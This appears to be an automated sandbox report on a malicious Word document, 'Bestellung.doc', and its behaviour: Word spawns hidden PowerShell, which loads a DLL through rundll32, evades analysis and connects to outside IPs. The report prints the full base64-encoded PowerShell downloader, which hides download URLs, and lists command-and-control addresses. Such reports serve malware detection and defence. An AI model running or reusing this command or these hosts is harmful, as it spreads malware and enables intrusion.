rACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023100B push ss; iretd 7_2_0023100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020F090 push edx; ret 7_2_0020F237
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F057F push ss; iretd 7_2_001F0580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00282D98 push 00282E25h; ret 7_2_00282E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290020 push 00290058h; ret 7_2_00290050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00284038 push 00284064h; ret 7_2_0028405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025A0B4 push 0025A0E0h; ret 7_2_0025A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025A0B2 push 0025A0E0h; ret 7_2_0025A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025B274 push 0025B2CDh; ret 7_2_0025B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C34C push 0026C378h; ret 7_2_0026C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E450 push ecx; mov dword ptr [esp], edx 7_2_0025E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290498 push 002904EFh; ret 7_2_002904E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002904F4 push 0029055Ch; ret 7_2_00290554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002905B8 push 002905E4h; ret 7_2_002905DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0028B588 push 0028B5CAh; ret 7_2_0028B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290580 push 002905ACh; ret 7_2_002905A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002905F0 push 0029063Ch; ret 7_2_00290634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290654 push 00290680h; ret 7_2_00290678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029068C push 002906B8h; ret 7_2_002906B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E696 push ecx; mov dword ptr [esp], edx 7_2_0025E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E6F0 push ecx; mov dword ptr [esp], edx 7_2_0025E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002906C4 push 002906F0h; ret 7_2_002906E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D6DC push 0025D751h; ret 7_2_0025D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258748 push 00258774h; ret 7_2_0025876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D754 push 0025D7ADh; ret 7_2_0025D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E750 push ecx; mov dword ptr [esp], edx 7_2_0025E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002937A8 push 002937E0h; ret 7_2_002937D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258798 push 002587C4h; ret 7_2_002587BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002907E4 push 00290827h; ret 7_2_0029081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290834 push 00290860h; ret 7_2_00290858
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029086C push 00290898h; ret 7_2_00290890

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv:Zone.Identifier read attributes | delete Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 7080
Source: unknown Network traffic detected: HTTP traffic on port 7080 -> 49175
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Bestellung.doc Stream path 'office' entropy: 7.95165191987 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233278 mov eax, dword ptr fs:[00000030h] 7_2_00233278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F27EC mov eax, dword ptr fs:[00000030h] 7_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403278 mov eax, dword ptr fs:[00000030h] 8_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D27EC mov eax, dword ptr fs:[00000030h] 8_2_001D27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F27EC mov eax, dword ptr fs:[00000030h] 9_2_002F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403278 mov eax, dword ptr fs:[00000030h] 10_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003027EC mov eax, dword ptr fs:[00000030h] 10_2_003027EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 70.32.89.105 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 203.157.152.9 168 Jump to behavior
